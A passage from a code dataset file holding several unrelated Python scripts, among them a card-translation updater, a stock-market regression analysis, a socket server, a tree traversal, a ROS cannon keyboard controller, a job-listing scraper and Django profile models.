{}\".format(json_file_path)))\n # Read in the json from the specified file\n with codecs.open(json_file_path, \"r\", \"utf-8\") as json_file:\n data = json.load(json_file)\n assert data, \"Could not load json at: '%r' \" % json_file_path\n return data\n\n\ndef json_dict_entry(entry, separator=\"\"):\n # Return a nicely formated json dict entry.\n # It does not include the enclosing {} and removes trailing white space\n json_data = json.dumps(entry, indent=4, ensure_ascii=False, sort_keys=True)\n json_data = json_data.strip(\n \"{}\"\n ).rstrip() # Remove outer{} and then trailing whitespace\n return separator + json_data\n\n\n# Multikey sort\n# see: http://stackoverflow.com/questions/1143671/python-sorting-list-of-dictionaries-by-multiple-keys\ndef multikeysort(items, columns):\n from operator import itemgetter\n\n for c in columns[::-1]:\n items = sorted(items, key=itemgetter(c))\n return items\n\n\ndef main(args):\n ###########################################################################\n # Get all the languages, and place the default language first in the list\n ###########################################################################\n languages = get_lang_dirs(args.card_db_dir)\n languages.remove(LANGUAGE_DEFAULT)\n languages.insert(0, LANGUAGE_DEFAULT)\n if LANGUAGE_XX not in languages:\n languages.append(LANGUAGE_XX)\n print(\"Languages:\")\n print(languages)\n print()\n\n ###########################################################################\n # Make sure the directories exist to hold the output\n 
###########################################################################\n\n # main output directory\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n # each language directory\n for lang in languages:\n # Make sure the directory is there to hold the file\n lang_dir = os.path.join(args.output_dir, lang)\n if not os.path.exists(lang_dir):\n os.makedirs(lang_dir)\n\n ###########################################################################\n # Get the types_db information\n # Store in a list in the order found in types[]. Ordered by card_type\n # 1. card_tags, 2. group_tags, 3. super groups\n ###########################################################################\n type_parts = set()\n\n # Get the card data\n type_data = get_json_data(os.path.join(args.card_db_dir, \"types_db.json\"))\n\n # Sort the cards by cardset_tags, then card_tag\n sorted_type_data = multikeysort(type_data, [\"card_type\"])\n\n with io.open(\n os.path.join(args.output_dir, \"types_db.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(sorted_type_data, f, indent=4, ensure_ascii=False)\n\n type_parts = list(set().union(*[set(t[\"card_type\"]) for t in sorted_type_data]))\n type_parts.sort()\n print(\"Unique Types:\")\n print(type_parts)\n print()\n\n ###########################################################################\n # Get the labels_db information\n # Store in a list in the order found.\n ###########################################################################\n all_labels = []\n\n # Get the card data\n label_data = get_json_data(os.path.join(args.card_db_dir, \"labels_db.json\"))\n\n all_labels = list(set().union(*[set(label[\"names\"]) for label in label_data]))\n\n with io.open(\n os.path.join(args.output_dir, \"labels_db.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(label_data, f, indent=4, ensure_ascii=False)\n\n all_labels.sort()\n print(\"Labels: \")\n print(all_labels)\n print()\n ###########################################################################\n # Fix up all the xx/types_xx.json files\n # Place entries in alphabetical order\n # If entries don't exist:\n # If the default language, set from information in the \"types_db.json\" file,\n # If not the default language, set based on information from the default language.\n # Lastly, keep any extra entries that are not currently used, just in case needed\n # in the future or is a work in progress.\n ###########################################################################\n for lang in languages:\n lang_file = \"types_\" + lang + \".json\"\n fname = os.path.join(args.card_db_dir, lang, lang_file)\n if os.path.isfile(fname):\n lang_type_data = get_json_data(fname)\n else:\n lang_type_data = {}\n\n for t in sorted(type_parts):\n if t not in lang_type_data:\n if lang == LANGUAGE_DEFAULT:\n lang_type_data[t] = t\n lang_type_default = lang_type_data\n else:\n lang_type_data[t] = lang_type_default[t]\n\n with io.open(\n os.path.join(args.output_dir, lang, lang_file), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(lang_type_data, f, indent=4, ensure_ascii=False)\n\n if lang == LANGUAGE_DEFAULT:\n lang_type_default = lang_type_data # Keep for later languages\n\n ###########################################################################\n # Get the cards_db information\n # Store in a list in the order found in cards[]. Ordered as follows:\n # 1. card_tags, 2. group_tags, 3. 
super groups\n ###########################################################################\n\n # Get the card data\n card_data = get_json_data(os.path.join(args.card_db_dir, \"cards_db.json\"))\n\n cards = set(card[\"card_tag\"] for card in card_data)\n groups = set(card[\"group_tag\"] for card in card_data if \"group_tag\" in card)\n super_groups = set([\"events\", \"landmarks\"])\n\n # Sort the cardset_tags\n for card in card_data:\n card[\"cardset_tags\"].sort()\n # But put all the base cards together by moving to front of the list\n if \"base\" in card[\"cardset_tags\"]:\n card[\"cardset_tags\"].remove(\"base\")\n card[\"cardset_tags\"].insert(0, \"base\")\n\n # Sort the cards by cardset_tags, then card_tag\n sorted_card_data = multikeysort(card_data, [\"cardset_tags\", \"card_tag\"])\n\n with io.open(\n os.path.join(args.output_dir, \"cards_db.json\"), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(sorted_card_data, lang_out, indent=4, ensure_ascii=False)\n\n # maintain the sorted order, but expand with groups and super_groups\n cards = [c[\"card_tag\"] for c in sorted_card_data]\n cards.extend(sorted(groups))\n cards.extend(sorted(super_groups))\n\n print(\"Cards:\")\n print(cards)\n print()\n\n ###########################################################################\n # Fix up all the cards_xx.json files\n # Place entries in the same order as given in \"cards_db.json\".\n # If entries don't exist:\n # If the default language, set based on information in the \"cards_db.json\" file,\n # If not the default language, set based on information from the default language.\n # Lastly, keep any extra entries that are not currently used, just in case needed\n # in the future or is a work in progress.\n ###########################################################################\n for lang in languages:\n\n # construct the cards json file name\n lang_file = \"cards_\" + lang + \".json\"\n fname = os.path.join(args.card_db_dir, lang, lang_file)\n if os.path.isfile(fname):\n lang_data = get_json_data(fname)\n else:\n lang_data = {}\n\n sorted_lang_data = collections.OrderedDict()\n fields = [\"description\", \"extra\", \"name\"]\n for card_tag in cards:\n lang_card = lang_data.get(card_tag)\n # print(f'looking at {card_tag}: {lang_card}')\n if not lang_card or lang == LANGUAGE_XX:\n # Card is missing, need to add it\n lang_card = {}\n if lang == LANGUAGE_DEFAULT:\n # Default language gets bare minimum. Really need to add by hand.\n lang_card[\"extra\"] = \"\"\n lang_card[\"name\"] = card_tag\n lang_card[\"description\"] = \"\"\n lang_card[\"untranslated\"] = fields\n lang_default = lang_data\n else:\n # All other languages should get the default languages' text\n lang_card[\"extra\"] = lang_default[card_tag][\"extra\"]\n lang_card[\"name\"] = lang_default[card_tag][\"name\"]\n lang_card[\"description\"] = lang_default[card_tag][\"description\"]\n lang_card[\"untranslated\"] = fields\n else:\n # Card exists, figure out what needs updating (don't update default language)\n if lang != LANGUAGE_DEFAULT:\n if \"untranslated\" in lang_card:\n # Has an 'untranslated' field. 
Process accordingly\n if not lang_card[\"untranslated\"]:\n # It is empty, so just remove it\n del lang_card[\"untranslated\"]\n else:\n # If a field remains untranslated, then replace with the default languages copy\n for field in fields:\n if field in lang_card[\"untranslated\"]:\n lang_card[field] = lang_default[card_tag][field]\n else:\n # Need to create the 'untranslated' field and update based upon existing fields\n untranslated = []\n for field in fields:\n if field not in lang_data[card_tag]:\n lang_card[field] = lang_default[card_tag][field]\n untranslated.append(field)\n if untranslated:\n # only add if something is still needing translation\n lang_card[\"untranslated\"] = untranslated\n lang_card[\"used\"] = True\n sorted_lang_data[card_tag] = lang_card\n unused = [c for c in lang_data.values() if \"used\" not in c]\n print(\n f'unused in {lang}: {len(unused)}, used: {len([c for c in lang_data.values() if \"used\" in c])}'\n )\n print([c[\"name\"] for c in unused])\n # Now keep any unused values just in case needed in the future\n for card_tag in lang_data:\n lang_card = lang_data.get(card_tag)\n if \"used\" not in lang_card:\n if lang != LANGUAGE_XX:\n lang_card[\"untranslated\"] = [\n \"Note: This card is currently not used.\"\n ]\n sorted_lang_data[card_tag] = lang_card\n else:\n del lang_card[\"used\"]\n\n # Process the file\n with io.open(\n os.path.join(args.output_dir, lang, lang_file), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(sorted_lang_data, lang_out, indent=4, ensure_ascii=False)\n\n if lang == LANGUAGE_DEFAULT:\n lang_default = lang_data # Keep for later languages\n\n ###########################################################################\n # Fix up the sets_db.json file\n # Place entries in alphabetical order\n ###########################################################################\n lang_file = \"sets_db.json\"\n set_data = get_json_data(os.path.join(args.card_db_dir, lang_file))\n\n with io.open(\n os.path.join(args.output_dir, lang_file), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(set_data, lang_out, sort_keys=True, indent=4, ensure_ascii=False)\n\n print(\"Sets:\")\n print(set(set_data))\n print()\n\n ###########################################################################\n # Fix up all the xx/sets_xx.json files\n # Place entries in alphabetical order\n # If entries don't exist:\n # If the default language, set from information in the \"sets_db.json\" file,\n # If not the default language, set based on information from the default language.\n ###########################################################################\n for lang in languages:\n lang_file = \"sets_\" + lang + \".json\"\n fname = os.path.join(args.card_db_dir, lang, lang_file)\n if os.path.isfile(fname):\n lang_set_data = get_json_data(fname)\n else:\n lang_set_data = {}\n\n for s in sorted(set_data):\n if s not in lang_set_data:\n lang_set_data[s] = {}\n if lang == LANGUAGE_DEFAULT:\n lang_set_data[s][\"set_name\"] = s.title()\n lang_set_data[s][\"text_icon\"] = set_data[s][\"text_icon\"]\n if \"short_name\" in set_data[s]:\n lang_set_data[s][\"short_name\"] = set_data[s][\"short_name\"]\n if \"set_text\" in set_data[s]:\n lang_set_data[s][\"set_text\"] = set_data[s][\"set_text\"]\n else:\n lang_set_data[s][\"set_name\"] = lang_default[s][\"set_name\"]\n lang_set_data[s][\"text_icon\"] = lang_default[s][\"text_icon\"]\n if \"short_name\" in lang_default[s]:\n lang_set_data[s][\"short_name\"] = lang_default[s][\"short_name\"]\n if \"set_text\" in 
lang_default[s]:\n lang_set_data[s][\"set_text\"] = lang_default[s][\"set_text\"]\n else:\n if lang != LANGUAGE_DEFAULT:\n for x in lang_default[s]:\n if x not in lang_set_data[s] and x != \"used\":\n lang_set_data[s][x] = lang_default[s][x]\n\n if lang == LANGUAGE_DEFAULT:\n lang_default = lang_set_data # Keep for later languages\n\n with io.open(\n os.path.join(args.output_dir, lang, lang_file), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(lang_set_data, lang_out, ensure_ascii=False, indent=4)\n\n ###########################################################################\n # bonuses_xx files\n ###########################################################################\n for lang in languages:\n # Special case for xx. Reseed from default language\n fromLanguage = lang\n if lang == LANGUAGE_XX:\n fromLanguage = LANGUAGE_DEFAULT\n\n copyfile(\n os.path.join(\n args.card_db_dir, fromLanguage, \"bonuses_\" + fromLanguage + \".json\"\n ),\n os.path.join(args.output_dir, lang, \"bonuses_\" + lang + \".json\"),\n )\n\n ###########################################################################\n # translation.txt\n ###########################################################################\n copyfile(\n os.path.join(args.card_db_dir, \"translation.md\"),\n os.path.join(args.output_dir, \"translation.md\"),\n )\n\n # Since xx is the starting point for new translations,\n # make sure xx has the latest copy of translation.txt\n copyfile(\n os.path.join(args.card_db_dir, LANGUAGE_XX, \"translation.txt\"),\n os.path.join(args.output_dir, LANGUAGE_XX, \"translation.txt\"),\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--card_db_dir\",\n default=os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"..\", \"src\", \"domdiv\", \"card_db\"\n ),\n help=\"directory of card data\",\n )\n parser.add_argument(\n \"--output_dir\",\n default=os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \".\", \"card_db\"\n ),\n help=\"directory for output data\",\n )\n args = parser.parse_args()\n main(args)\n","sub_path":"tools/update_language.py","file_name":"update_language.py","file_ext":"py","file_size_in_byte":17381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"285797341","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division ### true (float) division\nimport numpy as np\nfrom config import config\n\ndefault_encoding = \"utf-8\"\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport statsmodels.formula.api as smf\nimport datetime\nfrom scipy.stats.mstats import winsorize\nfrom linearmodels.datasets import jobtraining\nfrom linearmodels import PanelOLS\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\n#model = LogisticRegression(solver='liblinear', random_state=0).fit(x, y)\n\nfrom DataUtils import get_STK_MKTLink_StockInfo, get_year_QFII, get_MNMAPR_Accruals, get_industry_type, get_STK_HKEXtoSSE_Top10\n\nplt.rcParams['font.sans-serif'] = ['SimHei'] # display Chinese labels correctly\nplt.rcParams['axes.unicode_minus'] = False # display minus signs correctly\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\npd.set_option('display.width', 1000)\n\n\ndef __ols_effect__():\n \"\"\"\n Ignore this function\n :return:\n \"\"\"\n reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n ols = smf.ols(data=year_indicators, formula=reg1).fit()\n result = ols.summary()\n 
return result\n\n\ndef get_reslut_one():\n year_indicators = pd.read_csv(config['year_indicators'], dtype={'Stkcd': str, 'Trdyear': str})\n year_indicators['AIV_lead1'] = winsorize(year_indicators['AIV_lead1'], (0.01, 0.01))\n STK_MKTLink_StockInfo = get_STK_MKTLink_StockInfo()\n STK_MKTLink_StockInfo['Stkcd'] = STK_MKTLink_StockInfo['Stkcd'].astype(str)\n year_QFII = get_year_QFII()\n year_QFII['Stkcd'] = year_QFII['Stkcd'].astype(str)\n year_indicators = pd.merge(year_indicators, STK_MKTLink_StockInfo, on='Stkcd', how='left')\n year_indicators = year_indicators[year_indicators['WhetherAandH'] != 'Y']\n year_indicators = pd.merge(year_indicators, year_QFII, on=['Stkcd','Trdyear'], how='inner') # exclude the effect of foreign (QFII) investor holdings\n print(year_indicators)\n print(year_indicators.describe())\n
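 # difference-in-differences specification: hkex flags Stock Connect\n # (treated) firms, after flags the post-event years, and the hkex*after\n # interaction captures the treatment effect\n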
 reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n #reg1 = 'year_AIV~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n ols = smf.ols(data=year_indicators, formula=reg1).fit()\n return ols.summary()\n\ndef get_reslut_two():\n \"\"\"\n Group by the degree of Hong Kong (Stock Connect) capital participation\n :return:\n \"\"\"\n year_indicators = pd.read_csv(config['year_indicators'], dtype={'Stkcd': str, 'Trdyear': str})\n year_indicators['AIV_lead1'] = winsorize(year_indicators['AIV_lead1'], (0.01, 0.01))\n year_indicators['year_AIV'] = winsorize(year_indicators['year_AIV'], (0.01, 0.01))\n STK_HKEXtoSSE_Top10 = get_STK_HKEXtoSSE_Top10()\n year_indicators = pd.merge(year_indicators, STK_HKEXtoSSE_Top10, on='Stkcd', how='left')\n print(year_indicators)\n year_indicators = year_indicators.fillna({'top_ten': 'low'}) # fill missing values in the top_ten column\n year_indicators_high = year_indicators[year_indicators['top_ten'] == 'high']\n year_indicators_low = year_indicators[year_indicators['top_ten'] == 'low']\n # print(year_indicators_high)\n # print(year_indicators_high.describe())\n # print(year_indicators_low)\n # print(year_indicators_low.describe())\n reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n #reg1 = 'year_AIV~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n ols_high = smf.ols(data=year_indicators_high, formula=reg1).fit()\n ols_low = smf.ols(data=year_indicators_low, formula=reg1).fit()\n return ols_high.summary(), ols_low.summary()\n\n\n\n\n\n\ndef get_dacc_sigma():\n MNMAPR_Accruals = get_MNMAPR_Accruals()\n industry_type = get_industry_type()\n dacc_sigma = pd.merge(MNMAPR_Accruals, industry_type, on='Stkcd', how='left')\n dacc_sigma = dacc_sigma.dropna()\n\n return dacc_sigma\n\n\ndef __alpha_betas__(rdata, regModel, NWlag=12):\n \"\"\"\n Ignore this function\n :param rdata:\n :param regModel:\n :param NWlag:\n :return:\n \"\"\"\n ols = smf.ols(formula=regModel, data=rdata) \\\n .fit(cov_type='HAC', cov_kwds={'maxlags': NWlag, 'use_correction': True})\n params=ols.params\n t_stats=ols.tvalues\n p_values=ols.pvalues\n t_stats.index=t_stats.index.to_series().apply(lambda x:x+\"_t\").values\n p_values.index=p_values.index.to_series().apply(lambda x:x+\"_p\").values\n output=pd.concat([params, t_stats, p_values], axis=0) # concatenate the results\n output['Num.Obs.']=ols.nobs\n output['R-squared-adj']=ols.rsquared_adj\n output=pd.DataFrame(data=output.values.reshape([1,-1]),columns=output.index.to_series().values)\n output = output.apply(lambda x: __alpha_betas_significant__(x, params.index, p_values.index), axis=1)\n return output\n\n\n\n\nif __name__ == \"__main__\":\n pass\n # year_indicators = pd.read_csv(config['year_indicators'], dtype={'Stkcd': str, 'Trdyear': str})\n # year_indicators['AIV_lead1'] = winsorize(year_indicators['AIV_lead1'], (0.01, 0.01))\n # STK_MKTLink_StockInfo = get_STK_MKTLink_StockInfo()\n # STK_MKTLink_StockInfo['Stkcd'] = STK_MKTLink_StockInfo['Stkcd'].astype(str)\n # year_QFII = get_year_QFII()\n # year_QFII['Stkcd'] = year_QFII['Stkcd'].astype(str)\n # year_indicators = pd.merge(year_indicators, STK_MKTLink_StockInfo, on='Stkcd', how='left')\n # year_indicators = year_indicators[year_indicators['WhetherAandH'] != 'Y']\n # year_indicators = pd.merge(year_indicators, year_QFII, on=['Stkcd','Trdyear'], how='inner') # exclude the effect of foreign (QFII) investor holdings\n # print(year_indicators)\n # print(year_indicators.describe())\n # reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n #reg1 = 'year_AIV~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n # ols = smf.ols(data=year_indicators, formula=reg1).fit()\n # print(ols.summary())\n # print(year_indicators)\n # print(get_reslut_one())\n # print(get_dacc_sigma())\n #print(get_reslut_two())\n","sub_path":"table1_regession.py","file_name":"table1_regession.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"150183545","text":"import sys\nimport threading\nimport tcpServer\nimport executer\nfrom multiprocessing import Queue\nfrom multiprocessing import Process\nimport time\nimport queue\n\nclass SocketServer:\n def __init__(self,port,timeQueue):\n # make public queue\n self.commandQueue = Queue()\n self.timeQueue = timeQueue\n self.port = port\n # init module\n self.andRaspTCP = tcpServer.TCPServer(self.commandQueue, \"\", port, self.timeQueue)\n \n \n \n # set module to executer\n self.commandExecuter = executer.Executer(self.andRaspTCP, self.timeQueue)\n \n def gettingMsg(self):\n if(self.port == 35357):\n print(\"[USER SERVER] Getting Thread is Executing..\")\n elif(self.port == 35358):\n print(\"[GUARDIAN SERVER] Getting Thread is Executing..\")\n while True:\n try:\n self.command = self.commandQueue.get()\n #self.timeQueue.put(self.command)\n self.commandExecuter.startCommand(self.command)\n except:\n pass\n def sendingMsg(self):\n if(self.port == 35357):\n print(\"[USER SERVER] Sending Thread is Executing..\")\n elif(self.port == 35358):\n print(\"[GUARDIAN SERVER] Sending Thread is Executing..\")\n while True:\n try:\n #sys.stdout.write(\">>\")\n data = input()\n data = data.encode(\"utf-8\") \n data = str(data).split(\"b'\",1)[1].rsplit(\"'\",1)[0]\n data = str(data)+ '\\n' \n self.andRaspTCP.sendAll(data)\n except EOFError:\n pass\n \n def run(self):\n self.andRaspTCP.start()\n proc_sending = Process(target=self.sendingMsg,args=())\n proc_getting = Process(target=self.gettingMsg,args=())\n proc_getting.start()\n proc_sending.start()\n \n \n\n","sub_path":"Server/main_user.py","file_name":"main_user.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242419724","text":"\"\"\"\r\nGiven a binary tree, return the postorder traversal of its nodes’ values.\r\n\r\nExample :\r\n\r\nGiven binary tree\r\n\r\n 1\r\n \\\r\n 2\r\n /\r\n 3\r\nreturn [3,2,1].\r\n\r\nUsing recursion is not allowed.\r\n\"\"\"\r\n\r\ndef postorder_traversal(root):\r\n if not root:\r\n return []\r\n\r\n stack1 = [root]\r\n results = []\r\n stack2 = []\r\n\r\n while len(stack1) > 0:\r\n current = stack1.pop()\r\n
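 # record the value now; reversing stack2 at the end turns the\r\n # root-right-left visit order into left-right-root (postorder)\r\n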
stack2.append(current.val)\r\n        # push the left child first so nodes are popped in root-right-left\r\n        # order; reversing stack2 below then yields left-right-root (postorder)\r\n        if current.left is not None:\r\n            stack1.append(current.left)\r\n        if current.right is not None:\r\n            stack1.append(current.right)\r\n\r\n    return stack2[::-1]\r\n","sub_path":"LeetCode/Microsoft/postorder_traversal.py","file_name":"postorder_traversal.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"124147396","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import UInt16\n\nimport sys, select, termios, tty\n\ndef getKey():\n\ttty.setraw(sys.stdin.fileno())\n\tselect.select([sys.stdin], [], [], 0)\n\tkey = sys.stdin.read(1)\n\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n\treturn key\n\nif __name__==\"__main__\":\n\tsettings = termios.tcgetattr(sys.stdin)\n\n\tservo_pub = rospy.Publisher('servo', UInt16, queue_size = 1)\n\taccel_pub = rospy.Publisher('relay', UInt16, queue_size = 1)\n\n\trospy.init_node('cannon_controller')\n\n\taccel_on = False\n\n\ttry:\n\t\twhile not rospy.is_shutdown():\n\t\t\tkey = getKey()\n\t\t\tif key == ' ':\n\t\t\t\tprint(\"Fire!\")\n\t\t\t\tservo_pub.publish(80)\n\t\t\telif key == 'r':\n\t\t\t\taccel_on = not accel_on\n\t\t\t\tif accel_on:\n\t\t\t\t\tprint(\"Relay on\")\n\t\t\t\t\taccel_pub.publish(1)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Relay off\")\n\t\t\t\t\taccel_pub.publish(0)\n\t\t\telif key == 'e':\n\t\t\t\tprint(\"system down\")\n\t\t\t\tbreak\n\t\t\t\t\n\texcept Exception as e:\n\t\tprint(e)\n\n","sub_path":"Auto_Mode/catkin_ws/src/cannon_controller/scripts/keyboard_control.py","file_name":"keyboard_control.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"519104332","text":"import rsswriter\nimport time\nimport argparse\nimport bs4 as bs\nfrom urllib.parse import urljoin\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\ndef open_browser(url):\n    options = Options()\n    options.add_argument('--headless')\n    browser = webdriver.Firefox(firefox_options=options, executable_path=r'geckodriver')\n    browser.get(url)\n    time.sleep(3)\n    return browser\n\ndef check_pagination(browser):\n    try:\n        browser.find_element_by_xpath('//*[@id=\"pagination-bottom\"]/div[3]/a')\n        return True\n    except:\n        return False\n\ndef search_jobs(url, path):\n    browser = open_browser(url)\n\n    jobs_list = []\n\n    if check_pagination(browser) == True:\n        browser.find_element_by_xpath('//*[@id=\"pagination-bottom\"]/div[3]/a').click()\n        time.sleep(3)\n\n    soup = bs.BeautifulSoup(browser.page_source, 'lxml')\n    browser.quit()\n    jobs_section = soup.find('section', {'id': 'search-results-list'})\n    jobs_soup = jobs_section.find_all('a')\n\n    for job in jobs(jobs_soup, path):\n        jobs_list.append(job)\n\n    return jobs_list\n\ndef jobs(soup, path):\n    for job in soup:\n        if job.has_attr('data-job-id'):\n            link = urljoin('%s' % path, job.get('href'))\n            title = job.find('h2').text\n            yield link, title\n\ndef main():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('-url', required=True, help=\"tenethealth url\")\n    parser.add_argument('-output', required=True, help=\"name of rss file ex: feed.xml\")\n    parser.add_argument('-title', required=True, help=\"name in RSS feed tag\")\n    parser.add_argument('-link', required=True, help=\"location in RSS feed <link> tag\")\n\n    args = parser.parse_args()\n\n    jobs = search_jobs(args.url, 'https://jobs.tenethealth.com/')\n    rss_feed = rsswriter.format_rss(jobs, args.title, 
args.link)\n\n with open(args.output, 'w+') as f:\n f.write(rss_feed)\n\nif __name__ == '__main__':\n main()\n","sub_path":"desertcarenetwork-parser.py","file_name":"desertcarenetwork-parser.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"318680056","text":"import os\n\ndir_path = './assets/EMBO/'\n\n# list to store files\nres = []\n\n# Iterate directory\nfor path in os.listdir(dir_path):\n # check if current path is a file\n if os.path.isfile(os.path.join(dir_path, path)):\n res.append(path)\n\n\nwith open(\"out.txt\", \"w\") as f:\n for img in res:\n f.write(\"<img data-src=\\\"\"+dir_path[1:]+img+\"\\\" alt=\\\"\"+img[:-13]+\"\\\" class=\\\"lazyload act_image\\\" />\\n\")\n\n\n\n\n\n# \"<img src=\\\"\"+dir_path[1:]+img+\"\\\" alt=\\\"\"+img[:-4]+\"\\\" loading=\\\"lazy\\\">\"\n# \"\\t<div class=\\\"mySlides fade\\\">\\n\\t\\t<img src=\\\"\"+dir_path[1:]+img+\"\\\" alt=\\\"\"+img[:-4]+\">\\n\\t</div>\"\n","sub_path":"imagelist.py","file_name":"imagelist.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424157045","text":"from django.db import models\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nclass UserProfileInfo(models.Model):\n\n user=models.OneToOneField(User,on_delete=models.CASCADE)\n\n phone_number=models.IntegerField()\n\n date_of_birth=models.CharField(max_length=15)\n\n Address=models.CharField(max_length=200)\n\n school_10th=models.CharField(max_length=100)\n\n percentage_10th=models.IntegerField()\n\n school_12th=models.CharField(max_length=100)\n\n percentage_12th=models.IntegerField()\n Btech='B.tech'\n Bsc='B.sc'\n BCA='BCA'\n MCA='MCA'\n BBA='BBA'\n BE='B.E'\n NONE='None'\n CSE='Computer science'\n IT='Information technology'\n CE='Computer engineering'\n MATH='Mathematics'\n ML='Machine learning'\n ECE='Electronics and communication'\n\n grad_choices=((Btech,'B.tech'),(Bsc,'B.sc'),(BCA,'BCA'),(MCA,'MCA'),(BBA,'BBA'),(BE,'B.E'),(NONE,'None'))\n graduation=models.CharField(choices=grad_choices,max_length=7)\n\n branch_choices=((CSE,'Computer science'),(IT,'Information technology'),(CE,'Computer engineering'),(MATH,'Mathematics'),(ML,'Machine learning'),(ECE,'Electronics and communication'),(NONE,'None'))\n branch_graduation=models.CharField(choices=branch_choices,max_length=30)\n Cplusplus='C++'\n C='C'\n JAVA='JAVA'\n Csharp='C#'\n NET='.NET'\n PYTHON='PYTHON'\n JS='JavaScript'\n HTML='HTML'\n CSS='CSS'\n DBMS='Database'\n NETWORK='Networking'\n CLOUD='Cloud'\n AND='Android'\n AI='AI'\n DATASCIENCE='Data science'\n\n technical_choices=((Cplusplus,'C++'),(C,'C'),(JAVA,'JAVA'),(Csharp,'C#'),(NET,'.NET'),(PYTHON,'PYTHON'),(JS,'JavaScript'),(HTML,'HTML'),(CSS,'CSS'),(DBMS,'Database'),(NETWORK,'Networking'),(CLOUD,'Cloud'),(AND,'Android'),(ML,'ML'),(AI,'AI'),(DATASCIENCE,'Data science'))\n\n technical_skills_and_language=models.CharField(choices=technical_choices,max_length=15)\n\n Other_skills=models.CharField(choices=technical_choices,blank=True,max_length=15)\n Reading_books='Reading books'\n reading_novels='reading novels'\n Cooking='Cooking'\n Movies='Watching Movies'\n Badminton='Playing Badminton'\n Cricket='Playing Cricket'\n Football='Playing football'\n basketball='Playing basketball'\n Chess='Playing Chess'\n GYM='Going Gym'\n Music='listening Music'\n Dance='Dancing'\n\n hob_choices=((Reading_books,'Reading 
books'),(reading_novels,'reading novels'),(Cooking,'Cooking'),(Movies,'Watching Movies'),(Badminton,'Playing Badminton'),(Cricket,'Playing Cricket'),(Football,'Playing football'),(basketball,'Playing basketball'),(Chess,'Playing Chess'),(GYM,'Going Gym'),(Music,'listening Music'),(Dance,'Dancing'))\n Main_Hobbies=models.CharField(choices=hob_choices,max_length=25)\n\n Other_Hobbies=models.CharField(choices=hob_choices ,blank=True,max_length=25)\n\n achievement=models.CharField(max_length=100,blank=True)\n\n Project_Done=models.CharField(max_length=100,blank=True)\n\n profile_picture=models.ImageField(upload_to='profile_pics',blank=True)\n\n def __str__(self):\n return self.user.username\nclass questions(models.Model):\n Reading_books='Reading books'\n reading_novels='reading novels'\n Cooking='Cooking'\n Movies='Watching Movies'\n Badminton='Playing Badminton'\n Cricket='Playing Cricket'\n Football='Playing football'\n basketball='Playing basketball'\n Chess='Playing Chess'\n GYM='Going Gym'\n Music='listening Music'\n Dance='Dancing'\n Cplusplus='C++'\n C='C'\n JAVA='JAVA'\n Csharp='C#'\n NET='.NET'\n PYTHON='PYTHON'\n JS='JavaScript'\n HTML='HTML'\n CSS='CSS'\n DBMS='Database'\n NETWORK='Networking'\n CLOUD='Cloud'\n AND='Android'\n AI='AI'\n DATASCIENCE='Data science'\n ML='Machine learning'\n\n HR='HR'\n TECHNICAL='TECHNICAL'\n QUESTION_TYPE=((HR,'HR'),(TECHNICAL,'TECHNICAL'))\n Question_Type=models.CharField(choices=QUESTION_TYPE,max_length=10)\n GK='GK'\n Concept=\"Concept\"\n cat_choice=((Concept,\"Concept\"),(HR,'HR'),(TECHNICAL,'TECHNICAL'),(GK,'GK'),(Reading_books,'Reading books'),(reading_novels,'reading novels'),(Cooking,'Cooking'),(Movies,'Watching Movies'),(Badminton,'Playing Badminton'),(Cricket,'Playing Cricket'),(Football,'Playing football'),(basketball,'Playing basketball'),(Chess,'Playing Chess'),(GYM,'Going Gym'),(Music,'listening 